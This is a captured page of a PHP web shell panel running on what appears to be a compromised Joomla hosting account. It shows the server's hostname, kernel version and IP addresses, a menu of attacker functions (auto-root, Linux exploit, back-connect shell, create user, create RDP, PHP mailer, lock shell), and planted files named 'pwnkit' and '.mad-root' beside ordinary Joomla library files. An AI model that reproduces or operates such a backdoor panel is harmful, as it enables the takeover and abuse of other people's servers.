Linux webm008.cluster106.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.106.20.8 | : 216.73.217.10
Cant Read [ /etc/named.conf ]
5.6.40
associattd
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
associattd /
www-old /
libraries /
cms /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
language
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
access.php
8.56
KB
-rw-r--r--
actionsdropdown.php
5.59
KB
-rw-r--r--
batch.php
5.77
KB
-rw-r--r--
behavior.php
26.19
KB
-rw-r--r--
bootstrap.php
30.89
KB
-rw-r--r--
category.php
4.43
KB
-rw-r--r--
content.php
1.12
KB
-rw-r--r--
contentlanguage.php
1.53
KB
-rw-r--r--
date.php
1.93
KB
-rw-r--r--
dropdown.php
8.79
KB
-rw-r--r--
email.php
3.32
KB
-rw-r--r--
form.php
736
B
-rw-r--r--
formbehavior.php
4.41
KB
-rw-r--r--
grid.php
9.85
KB
-rw-r--r--
html.php
31.3
KB
-rw-r--r--
icons.php
1.52
KB
-rw-r--r--
jgrid.php
16.15
KB
-rw-r--r--
jquery.php
2.95
KB
-rw-r--r--
links.php
2.51
KB
-rw-r--r--
list.php
6.65
KB
-rw-r--r--
menu.php
8.11
KB
-rw-r--r--
number.php
1.52
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
rules.php
7.89
KB
-rw-r--r--
searchtools.php
4.09
KB
-rw-r--r--
select.php
27.35
KB
-rw-r--r--
sidebar.php
3.14
KB
-rw-r--r--
sliders.php
3.83
KB
-rw-r--r--
sortablelist.php
3.16
KB
-rw-r--r--
string.php
8.93
KB
-rw-r--r--
tabs.php
2.63
KB
-rw-r--r--
tag.php
6.72
KB
-rw-r--r--
tel.php
2.15
KB
-rw-r--r--
user.php
1.95
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : user.php
<?php /** * @package Joomla.Libraries * @subpackage HTML * * @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE */ defined('JPATH_PLATFORM') or die; /** * Utility class working with users * * @since 2.5 */ abstract class JHtmlUser { /** * Displays a list of user groups. * * @param boolean $includeSuperAdmin true to include super admin groups, false to exclude them * * @return array An array containing a list of user groups. * * @since 2.5 */ public static function groups($includeSuperAdmin = false) { $db = JFactory::getDbo(); $query = $db->getQuery(true) ->select('a.id AS value, a.title AS text, COUNT(DISTINCT b.id) AS level') ->from($db->quoteName('#__usergroups') . ' AS a') ->join('LEFT', $db->quoteName('#__usergroups') . ' AS b ON a.lft > b.lft AND a.rgt < b.rgt') ->group('a.id, a.title, a.lft, a.rgt') ->order('a.lft ASC'); $db->setQuery($query); $options = $db->loadObjectList(); for ($i = 0, $n = count($options); $i < $n; $i++) { $options[$i]->text = str_repeat('- ', $options[$i]->level) . $options[$i]->text; $groups[] = JHtml::_('select.option', $options[$i]->value, $options[$i]->text); } // Exclude super admin groups if requested if (!$includeSuperAdmin) { $filteredGroups = array(); foreach ($groups as $group) { if (!JAccess::checkGroup($group->value, 'core.admin')) { $filteredGroups[] = $group; } } $groups = $filteredGroups; } return $groups; } /** * Get a list of users. * * @return string * * @since 2.5 */ public static function userlist() { $db = JFactory::getDbo(); $query = $db->getQuery(true) ->select('a.id AS value, a.name AS text') ->from('#__users AS a') ->where('a.block = 0') ->order('a.name'); $db->setQuery($query); $items = $db->loadObjectList(); return $items; } }
Close